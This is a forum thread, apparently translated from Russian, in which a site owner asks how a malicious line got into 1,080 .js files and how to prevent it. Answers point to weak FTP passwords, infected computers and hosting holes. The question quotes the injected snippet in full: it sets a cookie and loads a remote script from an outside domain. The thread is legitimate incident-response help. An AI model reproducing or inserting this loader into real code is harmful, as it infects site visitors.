Tell me, please, how on the site in all files of the .js format at the end of the document there appeared such a line.

function g() { var r = new RegExp("(?:; )?1=([^;]*);?"); return r.test(document.cookie) ? true : false } var e = new Date(); e.setTime(e.getTime() + (2592000000)); if (!g() && window.navigator.cookieEnabled) { document.cookie = "1=1;expires=" + e.toGMTString() + ";path=/"; document.write('<scr' + 'ipt src="http://ratingsite.org/ratingsite.php"></scr' + 'ipt>'); }

Who could add it if no one had access and how to avoid it in the future. This line was in 1080 files.

Because of this line, Google considered this site malicious, and not one browser did not want to open.

  • > This line was in 1080 files. And what manually cleaned? if there was ? - Palmervan
  • Not by hand. Notepad ++ did everything for me. - webkostya
  • Underground knock? - VladD

1 answer 1

The reason for this may be:

  • a hole in some software, in a wordpress there or something like that
  • the virus is on your computer
  • problem with the security of the host (recently in plesk there was a vulnerability)
  • easy ftp password

ask the hoster for a log of ftp logins, if you see again the date of the file change, send this date to the support of the hoster.

so how does ftp look like then:

options (in order of probability)

  • weak password (gfhjkmujksqrjhjkm is not strong)
  • virus on the computer of someone who has access to ftp
  • hacking mail (weak password in the mail, stupid secret question)
  • a hole in the software hoster, passwords leaked.
  • man in the middle
  • and what is written in logs? next to that IP - zb ' '
  • Written type is open such a file and that's it. In short, the list of all the files that have been edited, as far as I understand, this is some kind of prog that they drove through hosting. - webkostya
  • 3
    open with what? ip so simple files do not open. usually done with the same holey sites bots. (show the log with ip, show, not your interpretation, without it you will be broken again and again) - zb
  • I apologize, but the logs will be only tomorrow, as they are at the boss on the computer. - webkostya
  • THERE IS A LINE OF TREES Tue Feb 05 23:22:22 2013 0 37.9.55.246 94020 /home/kpiru/public_html/Kp/scripts/1.1/jquery-1.7.min.js _ * c AND SUCH REQUESTS CONTRACT MORE THAN A THOUSAND. - webkostya